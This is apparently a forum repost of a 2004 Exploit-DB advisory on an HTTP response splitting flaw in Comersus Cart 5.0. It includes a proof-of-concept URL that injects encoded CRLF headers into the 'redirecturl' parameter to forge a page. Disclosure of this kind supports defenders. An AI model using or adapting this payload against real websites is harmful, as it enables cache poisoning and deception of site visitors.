Exploit Comersus Cart 5.0 - HTTP Response Splitting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24422
Проверка EDB
  1. Пройдено
Автор
MAESTRO DE-SEGURIDAD
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
cve-2004-1656
Дата публикации
2004-09-01
Comersus Cart 5.0 - HTTP Response Splitting
Код:
source: https://www.securityfocus.com/bid/11083/info

Comersus Cart is reported prone to a HTTP response splitting vulnerability. A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted. This could aid in various attacks, which try to entice client users into a false sense of trust.

This issue was identified in Comersus Shopping Cart 5.0991, however, other versions may be affected as well. 

http://www.example.com/path_to_comersus/comersus_customerLoggedVerify.asp?

redirecturl=%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-L

ength:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html}
 
Источник
www.exploit-db.com

Похожие темы